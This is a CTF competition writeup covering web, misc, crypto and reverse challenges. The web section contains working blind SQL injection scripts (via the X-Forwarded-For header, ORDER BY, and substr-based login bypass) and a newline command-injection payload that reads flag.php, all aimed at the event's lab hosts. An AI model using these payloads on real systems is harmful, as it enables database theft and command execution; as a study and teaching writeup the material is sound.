2017 火种CTF Writeup

程序员文章站 2022-05-14 08:34:04

Spent a Sunday playing a small CTF...

WEB

1 Sign-in

Just follow the account and you get the key.
key{welcome_to_anyuntec!}

2 A simple web challenge

Exploit an injection through the X-Forwarded-For (XFF) header.
The back-end logic is presumably an INSERT, so this is an INSERT injection:

$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

So we can inject into it. Here is the injection script:

#!/usr/bin/env python2
# -*-coding:utf-8-*-
# Time-based blind injection through the X-Forwarded-For header: the injected
# CASE makes the INSERT sleep for 5 s whenever the guessed byte is correct.
import requests

url = "http://aim.zhugeaq.com:82"
guess = '1234567890abcdeflg{}'   # characters expected in the flag
flag = ""
for i in range(1, 100):          # position in the flag (SUBSTRING is 1-based)
    for c in guess:
        payload = ("xx'+(select case when (ascii(substring((select flag from flag) from %d for 1))=%d) "
                   "then sleep(5) else 1 end) and '1'='1" % (i, ord(c)))
        headers = {"x-forwarded-for": payload}
        res = requests.get(url, headers=headers)
        if res.elapsed.seconds > 4:   # the sleep fired, so this byte is right
            flag = flag + c
            print flag
            break
print flag

flag{4c9551d5be5612f7bb5d286785}

3 Guess where I am

robots.txt reveals that index.txt should be visited:

    <?php
    if (empty($_GET["file"])){
        echo('../flag.php');
        return;
    }
    else{
        $filename='pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").'.html';
        include $filename;
    }
    ?>


4 The front end ran away QAQ

Viewing the source of index.txt:

    <?php
    $ip = isset($_POST['ip'])?$_POST['ip']:die();
    if(!preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i',$ip)){
        die("ip 格式错误!");
    }
    echo strlen($ip);
    if(strlen($ip)<7||strlen($ip)>21){
        die("ip 长度错误!");
    }
    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' .$ip );
    }else {
        // *nix
        $cmd = shell_exec( 'ping  -c 1 ' .$ip );
    }
    // Feedback for the end user
    echo  "<pre>{$cmd}</pre>";

The length limit on ip (within 25) is what gives us an opening: the regex only checks the start of the value, so anything after a valid-looking address is passed straight to the shell.
Construct:
ip=0.0.0.1%0acat flag.php
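As an added illustration (not part of the writeup), the challenge's check transcribed to Python 3 beside two stricter variants. It shows why the unanchored pattern accepts the newline payload above, why merely appending `$` still lets a trailing newline through, and how parsing the address and quoting the argument (the counterpart of PHP's filter_var/escapeshellarg) closes the hole; the sample inputs are constructed.

```python
import ipaddress
import re
import shlex

# The challenge's PCRE pattern, transcribed to Python. It is anchored only at the
# start, so a valid-looking prefix followed by anything (here a newline and a
# second command) is accepted; the 7..21 length gate does not help either.
CHALLENGE_PATTERN = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', re.I)

def challenge_check(ip):
    return CHALLENGE_PATTERN.match(ip) is not None and 7 <= len(ip) <= 21

def dollar_anchored_check(ip):
    # The usual "fix": add "$". In both PCRE and Python, "$" also matches right
    # before a final newline, so "1.2.3.4\n" still slips through.
    return re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', ip) is not None

def strict_ipv4(ip):
    # Parse instead of pattern-match: rejects newlines, octets above 255 and
    # any trailing bytes (PHP's filter_var($ip, FILTER_VALIDATE_IP) does the same).
    try:
        return isinstance(ipaddress.ip_address(ip), ipaddress.IPv4Address)
    except ValueError:
        return False

def build_ping_command(ip):
    # Hardened form of shell_exec('ping -c 1 ' . $ip): validate first, then quote
    # anyway (shlex.quote plays the role of PHP's escapeshellarg()).
    if not strict_ipv4(ip):
        raise ValueError("rejected ip value: %r" % (ip,))
    return "ping -c 1 " + shlex.quote(ip)

if __name__ == "__main__":
    # Constructed inputs: a plain address, the writeup's payload with %0a decoded,
    # and an address with only a trailing newline.
    for sample in ("0.0.0.1", "0.0.0.1\ncat flag.php", "0.0.0.1\n"):
        print(repr(sample), challenge_check(sample),
              dollar_anchored_check(sample), strict_ipv4(sample))
```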

5 Did you see my password

A basic injection challenge.
Some things turn out to be filtered:

information limit ()

The main obstacle is that () is filtered, so a normal injection does not work.
Testing locally, the column names can be obtained.
Try an ORDER BY injection:

# Blind injection via ORDER BY: the UNIONed row carries our guess in column 3,
# and sorting on that column reveals whether the guess sorts before or after
# the real password value, one character at a time.
import requests

url = "http://aim.zhugeaq.com:83/index.php"
string = ''
for i in range(1, 33):                 # one pass per character of the password
    for j in range(33, 127):           # printable ASCII candidates
        string += chr(j)
        data = {
            'username': "admin_r' union select 1,2,'{}' order by 3#".format(string),
            'password': "admin"
        }
        s = requests.post(url=url, data=data)
        content = s.content
        print chr(j), '|', string
        string = string[:-1]
        # Once the guess sorts after the real value, the admin_r row comes first;
        # the correct character is therefore the previous candidate.
        if 'admin_r' in content:
            string += chr(j - 1)
            print string, "***************************************"
            break
    print string

FLAG{93FCFF2AF3914F7}

6 A very hard web challenge

Tests basic injection knowledge.

Blacklist: where & and order limit sleep

Whitelist: union select from , # -- ascii = substr

# coding:utf-8
# Boolean-based blind injection. ascii, substr and () are allowed, so the
# password is read one byte at a time from the end (negative FROM offset).
import requests

url = 'http://aim.zhugeaq.com:85/01/login.php'
dic = '1234567890abcdef'           # the password is an md5 hex digest
string = ""
for i in range(2, 34):            # from(1)-i = -1 .. -32: last byte first
    for j in dic:
        payload = "1'/1=(ascii(substr((pass)from(1)-{}))={})/'1'='1".format(i, ord(j))
        data = {
            'username': payload,
            'pass': '1'
        }
        resp = requests.post(url=url, data=data)
        if "用户名错误" in resp.content:   # this response marks a correct guess
            string += j
            print string
print string[::-1]                # bytes were collected back to front

d1c46106fdda5b257a9f8bf503747fe4
Cracking the MD5 gives: aaa@qq.com#123
flag{b9b0b759ad3e8a5129044c115e042c59}

MISC

1. Intercepted a file

a2V5ezIwMTZfa2V5X2hlbHB9==
Base64 decode:
key{2016_key_help}

2. What is this

Obviously Unicode.

3. Keyboard

    #jrecbi]gyu8
    e.u pry(owRuuo.yQ)S
        e.u {pry(jd)S
            ypfS
                aoj ] rpe(jd)
            .qj.lyS
                p.ygpb jd
            cu (aoj V 96) abe (aoj W 123)S
                p.ygpb jdp((aoj[97}Ruuo.yQ)v{{mre{{(26) } 97)
            .ncu (aoj V 64) abe (aoj V 91)S
                p.ygpb jdp((aoj[65}Ruuo.yQ)v{{mre{{(26) } 65)
            .no.S
                p.ygpb jd
        p.ygpb --vhrcb(/{pry( j ) urp j cb o=)
    lpcby pry( -qpn?popbpo.+-w 13 )

It is ROT13 encryption.
The encrypted string is finally found: qpn?popbpo.+ -> xrl{rsrnrse}
Then a direct ROT13 conversion gives:
key{efeaeffr}
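Added example (not part of the writeup): the layout decoding in Python 3, assuming the challenge text is what comes out when QWERTY key positions are typed on a Dvorak layout. Each Dvorak symbol is mapped back to the QWERTY symbol on the same physical key, which turns the text into a readable ROT13 script, and ROT13 is then applied to the string argument exactly as the writeup does.

```python
import codecs

# Unshifted and shifted keys of a US QWERTY layout and of the Dvorak layout, listed
# in the same physical key order (digit row, top row, home row, bottom row).
QWERTY   = "`1234567890-=qwertyuiop[]\\asdfghjkl;'zxcvbnm,./"
QWERTY_S = '~!@#$%^&*()_+QWERTYUIOP{}|ASDFGHJKL:"ZXCVBNM<>?'
DVORAK   = "`1234567890[]',.pyfgcrl/=\\aoeuidhtns-;qjkxbmwvz"
DVORAK_S = '~!@#$%^&*(){}"<>PYFGCRL?+|AOEUIDHTNS_:QJKXBMWVZ'

# Typing QWERTY positions on a Dvorak layout prints the Dvorak symbol on that key
# (assumption about the challenge); decoding maps each Dvorak symbol back.
DVORAK_TO_QWERTY = str.maketrans(DVORAK + DVORAK_S, QWERTY + QWERTY_S)

def decode_keyboard(text):
    """Undo the layout swap; characters outside the table (space, newline) pass through."""
    return text.translate(DVORAK_TO_QWERTY)

def recover_flag(argument):
    """The decoded script is a ROT13 routine, so apply ROT13 to its string argument."""
    return codecs.decode(decode_keyboard(argument), "rot13")

# The first line of the challenge text and the argument of the final rot() call,
# both copied from the writeup.
FIRST_LINE = "#jrecbi]gyu8"
ARGUMENT = "qpn?popbpo.+"

if __name__ == "__main__":
    print(decode_keyboard(FIRST_LINE))   # header line of the hidden Python script
    print(decode_keyboard(ARGUMENT))     # the string handed to rot()
    print(recover_flag(ARGUMENT))
```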

CRYPTO

Decrypt 1

Decrypt 2

Base64 decode:
Tk5TWFM2M0pPTlJXR1kzR09KVEdPNURCTVZUR0NaM1NOQjJIMj09PQ==
Base32 decode:
NNSXS63JONRWGY3GOJTGO5DBMVTGCZ3SNB2H2===

key{iscccfrfgtaefagrht}

Decrypt 4

Figured it should be XOR, so I wrote a script:

    s1 = [0b00000010,0b00001000,0b00011010,0b00000110,0b00001010]
    s2 = 'large'
    flag = ''
    for i in range(5):
        flag += chr(s1[i]^ord(s2[i]))
    print flag

Decrypt 5

e6Z9i~]8R~U~QHE{RnY{QXg~QnQ{^XVlRXlp^XI5Q6Q6SKY8jUAA
A Caesar shift with a wide enough range does it:
a2V5ezY4NzQzMDAwNjUwMTczMjMwZTRhNThlZTE1M2M2OGU4fQ==
Decode:
key{68743000650173230e4a58ee153c68e8}

Decrypt 6

MD5 collision:

import hashlib
import random

def md5(s):
    return hashlib.md5(s).hexdigest()

# Brute-force a 4-character string whose MD5 starts with the given prefix.
while 1:
    s = ''.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890', 4))
    if md5(s)[0:10] == 'd9ddd1800f':
        print s
        break

d9ddd1800fb812bd62e3fc55c35599b0

REVERSE

*** Where did it go

First, it tells us the username is anyuntec.
Using IDA, the key function is located:

for ( i = 0; i < (signed int)strlen(&String); ++i )
{
  if ( *(&v7 + i) != i + *(&String + i) - strlen(&String) )
    break;
}

Finally, the reversing script:

# The check requires v7[i] == String[i] + i - strlen(String), so compute the
# value the binary compares against (v7) from the known username (String).
str1 = 'anyuntec'
str2 = ''
for i in range(len(str1)):
    str2 += chr(ord(str1[i]) + i - len(str1))
print str2

A simple PE reversing task.

***** my apk~

Decompiled with JEB and inspected the logic.
The username is Tenshine.
The flag is the MD5 of the username with every other character taken.
MD5 of the username:
b9c77224ff234f27ac6badf83b855c76
Resulting flag:
flag{bc72f242a6af3857}

re300

Checking the program with PEiD: a Win32 GUI program written in Delphi. Analyze it in IDA.
CreateThread is present, so a child-thread check is suspected.
Located it here.
Inspect dynamically in OllyDbg.
The child thread's function address is 0x409134.
Set a breakpoint and trace with Ctrl+F7 to find the handler; the trace leads to the following function.
Viewed in IDA.

The encryption function:

__int64 __fastcall sub_5C5054(__int64 a1, int a2, signed int a3)
{
  char *v3;
  int v4;
  char v5;
  signed int v6;
  char v7;
  char v8;
  __int64 v10; // [sp-20h] [bp-30h]@1
  unsigned int v11; // [sp+0h] [bp-10h]@1
  char v12; // [sp+7h] [bp-9h]@1
  int v13; // [sp+8h] [bp-8h]@1
  int v14; // [sp+Ch] [bp-4h]@1

  v13 = a2;
  v11 = HIDWORD(a1);
  v14 = a1;
  v10 = a1;
  v3 = (char *)a1;
  v4 = v13;
  v12 = 0;
  v5 = 0;
  v6 = 0;
  while ( v6 <= v11 )
  {
    v7 = *v3;
    *v3 ^= 0x78u;
    *v3 ^= 5u;
    *v3 ^= 0x27u;
    *v3 ^= v6++;
    v5 += v12;
    *v3 ^= v5;
    v8 = *(_BYTE *)v4++;
    *v3 ^= v8;
    ++v3;
    v12 = v7;
    if ( !(v6 % a3) )
      v4 = v13;
  }
  return v10;
}

This is the comparison function.
This is the memory comparison:

# -*- coding:utf-8 -*-
# Inverse of sub_5C5054. a is the 32-byte ciphertext that the memory compare
# checks against; b is the 16-byte key ("bwjs7Mnfa9Uxxkan") followed by the
# ciphertext, laid out as it was in memory.
a = [0x53 ,0x22 ,0x9B ,0x18 ,0xDB ,0x70 ,0xD0 ,0x40 ,0x2A ,0xD2 ,0x2F ,0xCA ,0xA4 ,0x11 ,0xC8 ,0xA5,
0x1D ,0xFD ,0x39 ,0x59 ,0x97 ,0x68 ,0x39 ,0xF5 ,0x94 ,0x45 ,0x07 ,0x2E ,0xA0 ,0x1D ,0x23 ,0x9D ]

b = [0x62 ,0x77, 0x6A, 0x73, 0x37 ,0x4D, 0x6E ,0x66, 0x61, 0x39, 0x55 ,0x78 ,0x78 ,0x6B, 0x61, 0x6E,
0x53 ,0x22, 0x9B, 0x18, 0xDB ,0x70, 0xD0 ,0x40, 0x2A, 0xD2, 0x2F ,0xCA ,0xA4 ,0x11, 0xC8, 0xA5,
0x1D ,0xFD, 0x39, 0x59, 0x97 ,0x68, 0x39 ,0xF5, 0x94, 0x45, 0x07 ,0x2E ,0xA0 ,0x1D, 0x23, 0x9D]

v5 = 0   # running 8-bit sum of the plaintext bytes seen so far (v5 in the decompile)
v7 = 0   # previous plaintext byte (v12 in the decompile)
for i in range(len(a)):
    # Undo the XOR chain; XOR commutes, so only the data-dependent terms
    # (key byte and v5) have to be fed the right state.
    a[i] ^= b[i]
    v5 += v7
    if v5 > 255:
        v5 = v5 & 255
    a[i] ^= v5
    a[i] ^= i
    a[i] ^= 0x27
    a[i] ^= 0x5
    a[i] ^= 0x78
    v7 = a[i]
    if (i + 1) % 16 == 0:
        # The key pointer is reset every 16 bytes: copy the start of the key
        # over the positions processed next (7 bytes is enough for the flag).
        for j in range(7):
            b[i + j + 1] = b[j]
print "".join([chr(i) for i in a])

key{vXpybehIyAPcUt28}
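A cleaner Python 3 reimplementation of sub_5C5054, added here and not the writeup's script: it runs the XOR chain in either direction with the key genuinely repeating every a3 bytes instead of copying key bytes around inside b. It assumes a3 = 16 and that the 16 bytes at the start of the writeup's b[] are the key a2; the ciphertext is the writeup's a[].

```python
# Key and ciphertext copied from the writeup's b[] and a[] arrays; the first
# 16 bytes of b[] are taken to be the key (a2) and 16 the key length (a3).
KEY = bytes([0x62, 0x77, 0x6A, 0x73, 0x37, 0x4D, 0x6E, 0x66,
             0x61, 0x39, 0x55, 0x78, 0x78, 0x6B, 0x61, 0x6E])
CIPHER = bytes([0x53, 0x22, 0x9B, 0x18, 0xDB, 0x70, 0xD0, 0x40, 0x2A, 0xD2, 0x2F, 0xCA, 0xA4, 0x11, 0xC8, 0xA5,
                0x1D, 0xFD, 0x39, 0x59, 0x97, 0x68, 0x39, 0xF5, 0x94, 0x45, 0x07, 0x2E, 0xA0, 0x1D, 0x23, 0x9D])

def xor_chain(buf, key, decrypt=False):
    """One pass of sub_5C5054 over buf (a1) with key (a2) repeating every len(key) (a3) bytes.

    Each byte is XORed with three constants, its index (v6), the running 8-bit sum of
    all previous plaintext bytes (v5) and one key byte. The sum depends on plaintext,
    so decryption feeds it the byte just recovered instead of the input byte.
    (The binary loops while v6 <= v11; here exactly len(buf) bytes are processed.)
    """
    out = bytearray(buf)
    v12 = v5 = kpos = 0            # previous plaintext byte, running sum, key index (v4 - v13)
    for v6 in range(len(out)):
        before = out[v6]
        v5 = (v5 + v12) & 0xFF     # v5 is a char in the binary: wraps at 256
        out[v6] ^= 0x78 ^ 0x05 ^ 0x27 ^ (v6 & 0xFF) ^ v5 ^ key[kpos]
        kpos += 1
        v12 = out[v6] if decrypt else before
        if (v6 + 1) % len(key) == 0:   # if ( !(v6 % a3) ) v4 = v13;
            kpos = 0
    return bytes(out)

def encrypt(plain, key=KEY):
    return xor_chain(plain, key)

def decrypt(cipher, key=KEY):
    return xor_chain(cipher, key, decrypt=True)

if __name__ == "__main__":
    print(decrypt(CIPHER))                       # the flag followed by whatever padded the buffer
    msg = b"constructed plaintext, 32 bytes!"    # constructed round-trip input
    assert decrypt(encrypt(msg)) == msg
```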
